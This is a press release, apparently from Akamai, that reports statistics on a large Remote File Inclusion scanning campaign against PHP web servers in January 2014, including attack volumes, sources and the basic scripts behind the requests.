A Two Week Overview of the Latest Massive Scale RFI Scanning

In the past several weeks, Akamai was in a unique position to witness a massively orchestrated attack, designed to map Internet facing web servers that are susceptible to certain specific vulnerabilities.

While various sources on the blogosphere speculated about the scale and nature of these attacks seen on their own infrastructure, Akamai's big data intelligence platform demonstrated the true massive scale and reach of this internet-wide orchestrated attack.

In order to thoroughly analyze this attack and bring you our conclusions and impressions, we extracted attack data on the last 2 weeks (January 5th - January 19th, 2014) from Akamai's security big data platform (Cloud Security Intelligence).

Detailed Findings:

During our analysis period, Akamai has seen a total of 2,071,089 Remote File Inclusion attack attempts, targeting mostly PHP applications.

Our data shows that at its peak during the past 2 weeks, 80,000 attacks were launched per hour. It is also quite obvious that attack volume has subsided gradually, and perhaps the attack is about to end.

In addition to the above, we saw that the most "active" attacker performed attacks against 86 different web sites, and sent a total of 73,515 attacks. The average number of attacked sites per attacker was 10 sites/attacker, while the average attacks per attacker stood on 8738 attacks/attacker.

When inspecting closely the top attack source IPs, we discovered that most of them were running on a web server, and seemed to belong to web hosting providers running the cPanel management application. Using web servers for launching massive scale attacks on the web is definitely becoming the de-facto approach for hackers who are looking for high bandwidth.

Depending on the attacker and target application, the attack itself seemed to look for 2,000 - 2,500 different known Remote File Inclusion attacks, mostly in PHP applications. Our data also shows that when the web server failed to respond according to the scanner's expected behavior (e.g. HTTP authentication was required, or an HTTP 5XX error was raised), scanning activity stopped after only a few attempts.

While we can't expose the names and industry sectors of the target sites, it's clear from the top-level domains of the sites, that attackers were not only interested in .com web sites, but also targeted government and military web properties.

Of the 2,071,089 attacks registered during our sample period, more than 99% of HTTP requests were extremely basic and were stripped down of almost all HTTP headers except the mandatory 'Host' header - this leads us to believe that a very rudimentary script performed the attacks, since sophisticated scanners usually perform more deep crawling and usually support cookie-setting, session token refresh and will submit more headers in order to mimic browser web interaction.

Systematic saving of data and the usage of parts of the database are only allowed if you have a written form of consent by unn | UNITED NEWS NETWORK GmbH.

You can use the QR code at the beginning of a press release to return to the corresponding details page. You can find further information including software recommendations for your smartphone at https://www.pressebox.de/info/glossar/#7646!